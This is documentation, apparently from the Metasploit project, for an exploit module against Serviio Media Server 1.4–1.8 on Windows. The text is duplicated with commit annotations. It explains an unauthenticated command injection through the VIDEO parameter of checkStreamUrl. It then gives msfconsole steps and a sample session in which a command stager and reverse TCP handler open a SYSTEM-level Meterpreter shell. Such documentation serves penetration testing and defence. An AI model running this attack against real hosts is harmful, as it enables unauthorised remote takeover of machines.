documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md

## Description

  This module exploits an unauthenticated remote command execution vulnerability in the console component of [Serviio Media Server](http://serviio.org/) versions 1.4 to 1.8 on Windows operating systems.

  The console service (on port 23423 by default) exposes a REST API which which does not require authentication.

  The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands.

## Vulnerable Application

  Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.

  Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).

  This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

  Installers:

  * [serviio-1.8-win-setup.exe](http://download.serviio.org/releases/serviio-1.8-win-setup.exe)
  * [serviio-1.7-win-setup.exe](http://download.serviio.org/releases/serviio-1.7-win-setup.exe)
  * [serviio-1.6-win-setup.exe](http://download.serviio.org/releases/serviio-1.6-win-setup.exe)
  * [serviio-1.5-win-setup.exe](http://download.serviio.org/releases/serviio-1.5-win-setup.exe)
  * [serviio-1.4-win-setup.exe](http://download.serviio.org/releases/serviio-1.4-win-setup.exe)

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/windows/http/serviio_checkstreamurl_cmd_exec`
  3. Do: `set rhost [IP]`
  4. Do: `run`
  5. You should get a session

## Scenarios

  ```
  msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
  msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
  rhost => 172.16.191.166
  msf exploit(serviio_checkstreamurl_cmd_exec) > check
  [*] 172.16.191.166:23423 The target appears to be vulnerable.
  msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
  verbose => true
  msf exploit(serviio_checkstreamurl_cmd_exec) > check

  [*] 172.16.191.166:23423 Serviio Media Server version 1.8
  [*] 172.16.191.166:23423 The target appears to be vulnerable.
  msf exploit(serviio_checkstreamurl_cmd_exec) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [*] Serviio Media Server version 1.8
  [*] Command Stager progress -   7.95% done (7999/100636 bytes)
  [*] Command Stager progress -  15.90% done (15998/100636 bytes)
  [*] Command Stager progress -  23.85% done (23997/100636 bytes)
  [*] Command Stager progress -  31.79% done (31996/100636 bytes)
  [*] Command Stager progress -  39.74% done (39995/100636 bytes)
  [*] Command Stager progress -  47.69% done (47994/100636 bytes)
  [*] Command Stager progress -  55.64% done (55993/100636 bytes)
  [*] Command Stager progress -  63.59% done (63992/100636 bytes)
  [*] Command Stager progress -  71.54% done (71991/100636 bytes)
  [*] Command Stager progress -  79.48% done (79990/100636 bytes)
  [*] Command Stager progress -  87.43% done (87989/100636 bytes)
  [*] Command Stager progress -  95.38% done (95988/100636 bytes)
  [*] Sending stage (957487 bytes) to 172.16.191.166
  [*] Command Stager progress - 100.00% done (100636/100636 bytes)
  [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > pwd 
  C:\Program Files\Serviio\bin
  ```
Add documentation 2017-05-06 12:58:53 +00:00			`## Description`

			`This module exploits an unauthenticated remote command execution vulnerability in the console component of [Serviio Media Server](http://serviio.org/) versions 1.4 to 1.8 on Windows operating systems.`

			`The console service (on port 23423 by default) exposes a REST API which which does not require authentication.`

			`The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands.`

			`## Vulnerable Application`

			`Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.`

			`Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).`

			`This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.`

			`Installers:`

			`* [serviio-1.8-win-setup.exe](http://download.serviio.org/releases/serviio-1.8-win-setup.exe)`
			`* [serviio-1.7-win-setup.exe](http://download.serviio.org/releases/serviio-1.7-win-setup.exe)`
			`* [serviio-1.6-win-setup.exe](http://download.serviio.org/releases/serviio-1.6-win-setup.exe)`
			`* [serviio-1.5-win-setup.exe](http://download.serviio.org/releases/serviio-1.5-win-setup.exe)`
			`* [serviio-1.4-win-setup.exe](http://download.serviio.org/releases/serviio-1.4-win-setup.exe)`

			`## Verification Steps`

			1. Start `msfconsole`
			2. Do: `use exploit/windows/http/serviio_checkstreamurl_cmd_exec`
			3. Do: `set rhost [IP]`
			4. Do: `run`
			`5. You should get a session`

sample output to scenarios conversion in docs 2017-05-31 21:21:38 -04:00			`## Scenarios`
Add documentation 2017-05-06 12:58:53 +00:00
			```
			`msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec`
			`msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166`
			`rhost => 172.16.191.166`
			`msf exploit(serviio_checkstreamurl_cmd_exec) > check`
			`[*] 172.16.191.166:23423 The target appears to be vulnerable.`
			`msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true`
			`verbose => true`
			`msf exploit(serviio_checkstreamurl_cmd_exec) > check`

			`[*] 172.16.191.166:23423 Serviio Media Server version 1.8`
			`[*] 172.16.191.166:23423 The target appears to be vulnerable.`
			`msf exploit(serviio_checkstreamurl_cmd_exec) > run`

			`[*] Started reverse TCP handler on 172.16.191.181:4444`
			`[*] Serviio Media Server version 1.8`
			`[*] Command Stager progress - 7.95% done (7999/100636 bytes)`
			`[*] Command Stager progress - 15.90% done (15998/100636 bytes)`
			`[*] Command Stager progress - 23.85% done (23997/100636 bytes)`
			`[*] Command Stager progress - 31.79% done (31996/100636 bytes)`
			`[*] Command Stager progress - 39.74% done (39995/100636 bytes)`
			`[*] Command Stager progress - 47.69% done (47994/100636 bytes)`
			`[*] Command Stager progress - 55.64% done (55993/100636 bytes)`
			`[*] Command Stager progress - 63.59% done (63992/100636 bytes)`
			`[*] Command Stager progress - 71.54% done (71991/100636 bytes)`
			`[*] Command Stager progress - 79.48% done (79990/100636 bytes)`
			`[*] Command Stager progress - 87.43% done (87989/100636 bytes)`
			`[*] Command Stager progress - 95.38% done (95988/100636 bytes)`
			`[*] Sending stage (957487 bytes) to 172.16.191.166`
			`[*] Command Stager progress - 100.00% done (100636/100636 bytes)`
			`[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > pwd`
			`C:\Program Files\Serviio\bin`
			```